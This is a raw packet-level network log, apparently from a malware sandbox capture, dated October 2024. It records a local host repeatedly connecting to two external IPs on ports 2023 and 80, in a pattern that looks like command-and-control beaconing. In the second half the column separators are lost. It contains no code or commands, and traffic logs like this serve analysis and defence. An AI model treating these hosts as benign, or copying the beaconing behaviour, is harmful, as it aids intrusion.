Oct 3, 2024 08:40:53.795104980 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.795978069 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.796878099 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.797861099 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.799057961 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799117088 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.799316883 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799345016 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799407005 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799434900 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799907923 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799935102 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.799966097 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800086021 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800112009 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800138950 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800164938 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800936937 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800962925 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.800992012 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.801188946 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.801215887 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.801240921 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.801727057 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803419113 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803445101 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803491116 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803518057 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803544044 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803570986 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803672075 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803699017 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803725004 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803750992 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803792953 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803818941 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803848028 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.803927898 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.833209038 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.838159084 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.838186979 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.838213921 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.838213921 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.838350058 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.838376999 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.838407040 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.843158007 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.849821091 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.849821091 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.855556011 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.855592966 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.855624914 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.856276035 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.856302977 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.856349945 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.856376886 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.856403112 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.885175943 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.885363102 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.885725021 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.886524916 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.887126923 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.890100956 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890115023 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890125990 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890162945 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.890166044 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890208960 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890279055 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890288115 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890300035 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890320063 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890328884 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890337944 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890407085 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890427113 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890453100 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890479088 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890527010 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890553951 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890604019 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890630007 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890655994 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890707970 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890733957 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890759945 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890805960 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890832901 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890858889 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.890885115 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891419888 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891448975 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891474009 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891504049 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891552925 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891580105 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.891608953 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892009974 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892035961 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892079115 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892175913 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892270088 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892297029 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.892328024 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.895052910 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.905961990 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.906194925 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.906872988 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.907366991 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.910847902 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.910907030 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.910922050 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.910949945 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911071062 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911098003 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911148071 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911175013 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911201954 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911248922 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911276102 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911305904 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911351919 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911381006 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911767006 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911865950 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911891937 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911969900 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.911995888 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912062883 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912089109 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912188053 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912267923 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912313938 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912339926 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912367105 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912487984 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.912514925 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.915729046 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.923326969 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.923378944 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.923434973 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:53.928189039 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928239107 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928267002 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928313017 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928339958 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928386927 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928414106 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928592920 CEST | 2023 | 49763 | 89.105.201.183 | 192.168.2.5
Oct 3, 2024 08:40:53.928658009 CEST | 49763 | 2023 | 192.168.2.5 | 89.105.201.183
Oct 3, 2024 08:40:54.075546980 CEST | 80 | 49766 | 185.208.158.248 | 192.168.2.5
Oct 3, 2024 08:40:54.075772047 CEST | 49766 | 80 | 192.168.2.5 | 185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.184535027 CEST4976680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.184807062 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.189737082 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:54.189841032 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.189970970 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.190007925 CEST8049766185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:54.190063000 CEST4976680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.194787979 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:54.886464119 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:54.886718988 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:54.998264074 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.003226995 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:55.242464066 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:55.242928028 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.356386900 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.356806040 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.361696959 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:55.361826897 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.361922979 CEST8049767185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:55.361984015 CEST4976780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.362102985 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:55.366884947 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.045413017 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.045579910 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.154511929 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.159980059 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.394747972 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.394949913 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.512135029 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.512454987 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517508984 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.517606020 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517759085 CEST8049768185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.517770052 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.517819881 CEST4976880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:56.522623062 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.905188084 CEST20234971489.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.915585041 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.920490980 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.920579910 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.928678036 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.933613062 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.933706999 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:56.938606024 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:56.947262049 CEST497142023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:57.227519989 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.227685928 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.373248100 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.373608112 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.380122900 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.380229950 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.380521059 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.381380081 CEST8049769185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.381444931 CEST4976980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:57.385370016 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.749028921 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:57.790980101 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:58.064780951 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.064857006 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.184329987 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.184695005 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.189744949 CEST8049772185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.189815998 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.189852953 CEST4977280192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.189918041 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.190072060 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:58.194876909 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.315911055 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:58.320884943 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.320924044 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.320961952 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:58.321074963 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.086555958 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.087090969 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.087367058 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.088099957 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.088176966 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.088196039 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.093374968 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.215570927 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.215970039 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.220804930 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.220916033 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.220988035 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.224005938 CEST8049773185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.224080086 CEST4977380192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:40:59.225820065 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.476816893 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.525381088 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.679896116 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.728660107 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:40:59.934163094 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:40:59.934413910 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.077588081 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.077903986 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.083300114 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.083389997 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.083481073 CEST8049774185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.083533049 CEST4977480192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.084393978 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.090616941 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.311049938 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.311763048 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.316210032 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.317142963 CEST20234977189.105.201.183192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.317205906 CEST497712023192.168.2.589.105.201.183
                                                                                                    Oct 3, 2024 08:41:00.787364960 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.787445068 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.921828985 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.922220945 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.934305906 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.934386969 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.934550047 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.935759068 CEST8049775185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:00.935823917 CEST4977580192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:00.948292971 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:01.898088932 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:01.898164988 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.016957045 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.017498016 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022557020 CEST8049776185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.022579908 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.022649050 CEST4977680192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022716045 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.022850990 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.028131008 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.735198975 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.736191034 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.898607969 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.899442911 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.905047894 CEST8049777185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.905107975 CEST4977780192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.905320883 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:02.905381918 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.920604944 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:02.925570965 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.596120119 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.596214056 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.718857050 CEST4977880192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.719202042 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.724497080 CEST8049779185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.724584103 CEST4977980192.168.2.5185.208.158.248
                                                                                                    Oct 3, 2024 08:41:03.724586964 CEST8049778185.208.158.248192.168.2.5
                                                                                                    Oct 3, 2024 08:41:03.724658012 CEST4977880192.168.2.5185.208.158.248
